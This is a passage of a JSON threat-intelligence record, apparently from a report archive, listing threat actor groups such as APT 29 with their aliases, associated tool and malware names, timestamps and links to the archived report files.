			"source_name": "MISPGALAXY:GOLD PRELUDE",
			"tools": [
				"FakeUpdates",
				"FakeUpdate",
				"SocGholish"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "821d8858-a784-4ab2-9ecb-56c7afeed7d7",
			"created_at": "2023-11-21T02:00:07.403629Z",
			"updated_at": "2026-04-10T02:00:03.479942Z",
			"deleted_at": null,
			"main_name": "SilverFish",
			"aliases": [],
			"source_name": "MISPGALAXY:SilverFish",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270",
			"created_at": "2022-10-25T16:07:23.341684Z",
			"updated_at": "2026-04-10T02:00:04.549917Z",
			"deleted_at": null,
			"main_name": "APT 29",
			"aliases": [
				"APT 29",
				"ATK 7",
				"Blue Dev 5",
				"BlueBravo",
				"Cloaked Ursa",
				"CloudLook",
				"Cozy Bear",
				"Dark Halo",
				"Earth Koshchei",
				"G0016",
				"Grizzly Steppe",
				"Group 100",
				"ITG11",
				"Iron Hemlock",
				"Iron Ritual",
				"Midnight Blizzard",
				"Minidionis",
				"Nobelium",
				"NobleBaron",
				"Operation Ghost",
				"Operation Office monkeys",
				"Operation StellarParticle",
				"SilverFish",
				"Solar Phoenix",
				"SolarStorm",
				"StellarParticle",
				"TEMP.Monkeys",
				"The Dukes",
				"UNC2452",
				"UNC3524",
				"Yttrium"
			],
			"source_name": "ETDA:APT 29",
			"tools": [
				"7-Zip",
				"ATI-Agent",
				"AdFind",
				"Agentemis",
				"AtNow",
				"BEATDROP",
				"BotgenStudios",
				"CEELOADER",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobalt Strike",
				"CobaltStrike",
				"CosmicDuke",
				"Cozer",
				"CozyBear",
				"CozyCar",
				"CozyDuke",
				"Danfuan",
				"EnvyScout",
				"EuroAPT",
				"FatDuke",
				"FoggyWeb",
				"GeminiDuke",
				"Geppei",
				"GoldFinder",
				"GoldMax",
				"GraphDrop",
				"GraphicalNeutrino",
				"GraphicalProton",
				"HAMMERTOSS",
				"HammerDuke",
				"LOLBAS",
				"LOLBins",
				"LiteDuke",
				"Living off the Land",
				"MagicWeb",
				"Mimikatz",
				"MiniDionis",
				"MiniDuke",
				"NemesisGemina",
				"NetDuke",
				"OnionDuke",
				"POSHSPY",
				"PinchDuke",
				"PolyglotDuke",
				"PowerDuke",
				"QUIETEXIT",
				"ROOTSAW",
				"RegDuke",
				"Rubeus",
				"SNOWYAMBER",
				"SPICYBEAT",
				"SUNSHUTTLE",
				"SeaDaddy",
				"SeaDask",
				"SeaDesk",
				"SeaDuke",
				"Sharp-SMBExec",
				"SharpView",
				"Sibot",
				"Solorigate",
				"SoreFang",
				"TinyBaron",
				"WINELOADER",
				"WellMail",
				"WellMess",
				"cobeacon",
				"elf.wellmess",
				"reGeorg",
				"tDiscoverer"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434295,
	"ts_updated_at": 1775826684,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.pdf",
		"text": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.txt",
		"img": "https://archive.orkl.eu/6e9553c0cd65809465809a31b2814f4f26acbefd.jpg"
	}
}